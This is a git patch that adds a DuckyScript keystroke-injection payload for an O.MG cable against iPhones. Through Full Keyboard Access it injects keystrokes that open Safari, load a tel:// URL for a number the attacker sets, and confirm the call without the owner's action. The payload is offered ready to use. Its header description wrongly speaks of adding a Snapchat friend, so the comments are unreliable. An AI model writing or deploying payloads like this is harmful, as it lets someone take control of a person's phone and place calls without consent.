From 36b1a7bb456e23e238650a28032e6cf1cfd04530 Mon Sep 17 00:00:00 2001 From: Peaks <115900893+Peaakss@users.noreply.github.com> Date: Sun, 27 Aug 2023 21:23:06 -0400 Subject: [PATCH] Create iOS Call Phone Number --- iOS Call Phone Number | 52 +++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 52 insertions(+) create mode 100644 iOS Call Phone Number diff --git a/iOS Call Phone Number b/iOS Call Phone Number new file mode 100644 index 0000000..1625ef3 --- /dev/null +++ b/iOS Call Phone Number @@ -0,0 +1,52 @@ +REM Version 1.0 + +REM OS: iOS + +REM Author: Peaakss / Peaks +REM ----------------------------------------------- +REM READ THIS BEFORE USING PAYLOAD + +REM Description: This payload uses a URL scheme to quickly navigate to a user profile on snapchat and add them as a friend + +REM NOTICE Payload was made on iOS 16.4 - iPhone | Timing may have have to be changed based on version/model + +REM NOTICE Lighting to USB-A or USB-C camera adapter is needed to run this payload, active end of the O.MG cable must be plugged into the end of the adapter, the lighting end is displayed on the sales page before purchasing the O.MG cable, a adapter is needed because there is no lightning active end + +REM NOTICE This payload needs Full Keyboard Access to enabled on the device + +REM NOTICE Make sure to change "Phone Number" with the number you wish to call. + +REM ----------------------------------------------- + + +DEFINE #NUMBER "Phone Number" +DEFINE #URL tel://#NUMBER + +FUNCTION MAIN() +DELAY 1000 +GUI h +DELAY 250 +GUI h +DELAY 500 +GUI SPACE +DELAY 1500 +STRING Safari +DELAY 1000 +ENTER +DELAY 500 +GUI n +DELAY 500 +GUI l +DELAY 250 +STRING #URL +DELAY 2000 +ENTER +DELAY 1500 +TAB +DELAY 500 +UPARROW +DELAY 250 +SPACE +END_FUNCTION + +MAIN()